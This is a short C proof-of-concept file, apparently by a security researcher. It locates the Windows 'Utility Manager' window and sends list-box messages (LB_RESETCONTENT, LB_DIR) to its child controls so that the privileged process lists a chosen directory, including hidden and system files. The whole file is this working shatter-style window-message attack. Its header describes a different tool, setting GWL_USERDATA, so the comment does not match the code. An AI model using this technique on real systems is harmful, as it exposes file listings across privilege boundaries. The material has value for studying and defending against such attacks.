/*************************************************************************************
* FuzzWindowLong.c
*
* Iterates through all available windows setting the GWL_USERDATA value
*
* Brett Moore [ brett.moore@insomniasec.com ]
*
*************************************************************************************/
#include <stdio.h> 
#include <windows.h> 
#include <COMMCTRL.H>


#define _WIN32_WINNT 0x0500

int main(int argc, char *argv[]) 
{ 
	long lResult,hWnd,hWndControl;
		
	char tWindow[]="Utility Manager";// The name of the main window
	
long x;

LVITEM pItem;

printf("\n\t      Utility Manager Directory Viewing\n");
printf("\t          brett.moore@insomniasec.com\n\n");
	
	if(argc<2)
	{
		printf("+ utildir [directory]\\*.*\n");
		exit(0);
	}
	
	printf("+ Finding %s Window...\n",tWindow);
	hWnd = (long)FindWindow(NULL,tWindow);

	if(hWnd == NULL)
	{
		printf("Window not found\n");
		exit(0);
	}
	hWndControl = GetNextWindow(hWnd,GW_CHILD);

	while (hWndControl != NULL)
	{
				
		printf("+ Sending messages to child window..0x%xh\n",hWndControl);

		// Set the window size
		SetWindowPos((HWND) hWndControl,HWND_TOP,1,1,365,280,SWP_SHOWWINDOW);

		// We just post to all the child windows coz we lazy
		lResult = SendMessage((HWND) hWndControl,LB_RESETCONTENT,0,0);
		
		// We just post to all the child windows coz we lazy
		lResult = SendMessage((HWND) hWndControl,(UINT)  LB_DIR,DDL_DRIVES | DDL_DIRECTORY | DDL_HIDDEN | DDL_READONLY | DDL_READWRITE | DDL_SYSTEM,argv[1]);
		hWndControl = GetNextWindow(hWndControl ,GW_CHILD);
	}

	
	printf("+ Done...\n");
	return 0;
}
